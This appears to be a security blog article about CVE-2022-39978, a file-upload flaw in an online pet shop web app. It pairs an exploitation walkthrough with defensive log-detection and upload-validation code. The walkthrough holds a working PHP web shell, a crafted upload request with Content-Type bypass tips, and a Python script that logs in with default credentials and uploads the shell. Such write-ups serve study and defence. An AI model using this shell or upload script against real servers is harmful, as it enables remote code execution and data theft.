In this article, you'll learn about a dangerous vulnerability in a popular web app—how it works, how to exploit it, and how to protect against it.
Introduction
In September 2022, researchers discovered a critical security flaw—CVE-2022-39978—in the “Online Pet Shop Web App v1.”. This software, often used by small businesses to manage pet store operations and e-commerce, was found to have a serious vulnerability that allows attackers to upload any file they want, including malicious scripts.
Attackers who exploit this bug can take over the server, steal data, or cause other damage. Let’s break down how this attack works, show real code examples, and provide steps for protection.
How the Vulnerability Works
The core flaw is that the Product List’s Editing function allows users to upload images for products, but it does not check if what’s being uploaded is actually an image. This means an attacker can upload a PHP script instead of a real photo.
The app stores this file in the webroot (where web pages and scripts run), and if an attacker accesses their uploaded script, it will execute on the server. This is called remote code execution (RCE)—one of the most dangerous vulnerabilities in web apps.
The Exploitation Process
Let’s walk through the exploitation step-by-step.
The vulnerable upload point is usually found at a URL like
http://[YOUR-TARGET]/admin/products_edit.php?id=[PRODUCT_ID]
This page contains a form for editing a product, including the ability to upload a new picture.
Here’s a simple PHP web shell (shell.php) you can use for testing:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
This code allows you to run any command by visiting the script in a browser and passing a cmd parameter.
3. Upload the Malicious File
In the form, select your shell.php (or rename it as shell.jpg if there's basic extension filtering).
Use a tool like Burp Suite or your browser’s Developer Tools to intercept the request and change the Content-Type if you need to bypass restrictions.
Example request snippet:
POST /admin/products_edit.php?id=5 HTTP/1.1
Host: victim-petshop.local
Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266

-----------------------------9051914041544843365972754266
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

[PHP CODE HERE]
-----------------------------9051914041544843365972754266--
After uploading, the file is often placed in a web-accessible directory. For example:
http://[YOUR-TARGET]/uploads/shell.php
Visit this URL, and if successful, you should see your web shell.
To run commands, just pass them via the cmd parameter:
http://[YOUR-TARGET]/uploads/shell.php?cmd=whoami
If you see the server’s username, the exploit worked!
Here is a simple Python script to automate the upload:
import requests

url = "http://TARGET/admin/products_edit.php?id=1"
shell = {
    "file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

# Replace with actual credentials or skip if not needed
session = requests.Session()
login_data = {"username": "admin", "password": "admin"}
session.post("http://TARGET/admin/login.php", data=login_data)

r = session.post(url, files=shell)
print("Upload response:", r.status_code)
print("Now access your shell at /uploads/shell.php?cmd=whoami")
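From the defender's side, the access pattern this section describes (a request for a .php file under /uploads/, optionally carrying a cmd parameter, shortly after a POST to the product editor) is easy to pick out of ordinary web server logs. The script below is an added example, not part of the original article or the Pet Shop app; the Apache combined-format log lines, IP addresses, hostnames and user agents in it are constructed, while the /uploads/ path, the products_edit.php path and the cmd parameter name are the ones used in the walkthrough above. The list of script suffixes is an assumption about which extensions the server would hand to a PHP handler.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines. IPs, timestamps and user agents
# are invented; the paths mirror the walkthrough above.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2022:20:15:01 +0000] "GET /uploads/cat.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Oct/2022:20:15:03 +0000] "POST /admin/products_edit.php?id=5 HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
10.0.0.9 - - [27/Oct/2022:20:15:04 +0000] "GET /uploads/shell.php HTTP/1.1" 200 12 "-" "python-requests/2.28.1"
10.0.0.9 - - [27/Oct/2022:20:15:05 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.0.0.7 - - [27/Oct/2022:20:16:00 +0000] "GET /admin/products_edit.php?id=5 HTTP/1.1" 200 8832 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_PREFIX = "/uploads/"                    # from the walkthrough above
EDITOR_PATH = "/admin/products_edit.php"       # the vulnerable upload form
SCRIPT_SUFFIXES = (".php", ".phtml", ".phar")  # assumed PHP handler suffixes
COMMAND_PARAMS = {"cmd"}                       # parameter the sample shell reads


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = set(parse_qs(parts.query).keys())
    return rec


def find_suspicious(log_text):
    """Return [(ip, path, [reasons])] for requests that look like a script
    being reached through the upload directory, in log order."""
    uploaders = set()  # clients that submitted the product editor form
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].lower()
        # Remember who used the editor; a later hit from the same client
        # is far more likely to be "upload, then execute" than a scanner.
        if rec["method"] == "POST" and path == EDITOR_PATH:
            uploaders.add(rec["ip"])
            continue
        if not (path.startswith(UPLOAD_PREFIX) and path.endswith(SCRIPT_SUFFIXES)):
            continue
        reasons = ["script requested from the upload directory"]
        if rec["params"] & COMMAND_PARAMS:
            reasons.append("command parameter present")
        if rec["ip"] in uploaders:
            reasons.append("same client posted to the product editor earlier")
        if rec["status"] == "200":
            reasons.append("served with HTTP 200 rather than refused")
        hits.append((rec["ip"], rec["path"], reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {path}: {'; '.join(reasons)}")
```

Any GET for a script under the upload directory is already worth an alert on this app, since nothing legitimate is supposed to execute there; the extra reasons (command parameter, prior POST to the editor, 200 status) are what turn a single alert into a confident "upload followed by execution" finding. Running the same rule against the upload directory on disk (any file whose final suffix is in SCRIPT_SUFFIXES) is the matching host-side check.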
How to Fix (Mitigation)
1. Restrict Allowed File Types: Only allow genuine images (validate MIME type, file extension, and, ideally, use libraries to check image content).
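The following validator is an added example of item 1, written in Python for illustration; it is not the Pet Shop app's own code (which is PHP) and the same checks translate directly to its upload handler. It looks only at the final file extension and the file's leading bytes, takes no Content-Type argument at all (the walkthrough above shows that header being rewritten in a proxy, so it carries no trust), and stores the file under a server-generated random name so an attacker-chosen name never reaches disk. The signature table, the 2 MiB size cap and the storage-directory convention are assumed policy values.

```python
import os
import secrets

# Extension allow-list mapped to the magic bytes a genuine file must start
# with. Constructed for this example; add formats only if the app must
# accept them.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed policy value: 2 MiB


def _final_extension(filename):
    """Lower-cased text after the LAST dot of the bare file name.

    Directory components are stripped first, so "../shell.php" and
    "shell.php" are treated alike. The last suffix is what the web server
    uses to choose a handler, so it is the only one that matters here.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    return base.rpartition(".")[2].lower() if "." in base else ""


def validate_image_upload(filename, content):
    """Return (ok, reason) for a candidate product-image upload.

    Deliberately has no Content-Type parameter: the header the browser
    sent is attacker-controlled. Only the extension and the bytes count.
    """
    if not content:
        return False, "empty upload"
    if len(content) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    ext = _final_extension(filename)
    if ext not in IMAGE_SIGNATURES:
        return False, "extension not allowed"
    if not any(content.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, f"content is not a {ext} image"
    return True, "ok"


def storage_name(filename):
    """Server-chosen random name; the client's name never touches disk."""
    ext = _final_extension(filename)
    if ext not in IMAGE_SIGNATURES:
        raise ValueError("extension not allowed")
    return f"{secrets.token_hex(16)}.{ext}"


def save_product_image(filename, content, storage_dir):
    """Validate, then write under a random name. Returns the stored name.

    storage_dir is assumed to sit OUTSIDE the web root (or in a directory
    where script execution is disabled), with images served back through
    a handler that sets an image Content-Type. That way nothing the app
    stores can be executed even if one of the checks above is bypassed.
    """
    ok, reason = validate_image_upload(filename, content)
    if not ok:
        raise ValueError(reason)
    name = storage_name(filename)
    os.makedirs(storage_dir, exist_ok=True)
    with open(os.path.join(storage_dir, name), "wb") as fh:
        fh.write(content)
    return name


if __name__ == "__main__":
    # Constructed samples: a genuine PNG header versus a script renamed .jpg.
    samples = {
        "cat.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "shell.php": b"<?php echo 'x'; ?>",
        "shell.jpg": b"<?php echo 'x'; ?>",
        "shell.php.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    }
    for name, data in samples.items():
        print(f"{name:15s} -> {validate_image_upload(name, data)}")
```

Note what happens to the double-extension case: "shell.php.png" with a real PNG header passes validation, because only the final suffix is consulted, and is then written as a random name ending in ".png", so the ".php" in the original name is discarded before the file exists on disk. Magic-byte checks alone do not stop an image with PHP appended after a valid header; keeping the storage directory non-executable is what makes that polyglot harmless.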
Original References
- Exploit Database Entry
- NVD - CVE-2022-39978
- GitHub Security Advisory
Conclusion
CVE-2022-39978 demonstrates once again the dangers of poorly validated file uploads. It’s an easy-to-exploit bug that can lead to total system compromise. If you run or manage the Pet Shop app (or any web application with uploads), always ensure strict checks are in place.
If you want to go deeper into file upload vulnerabilities, check
- OWASP Unrestricted File Upload
Stay safe, patch often, and audit your web apps!
*Copyright © 2024. This exclusive post is for educational and defensive cybersecurity purposes only. Never exploit systems you don’t own or have permission to test.*
Timeline
Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:06:00 UTC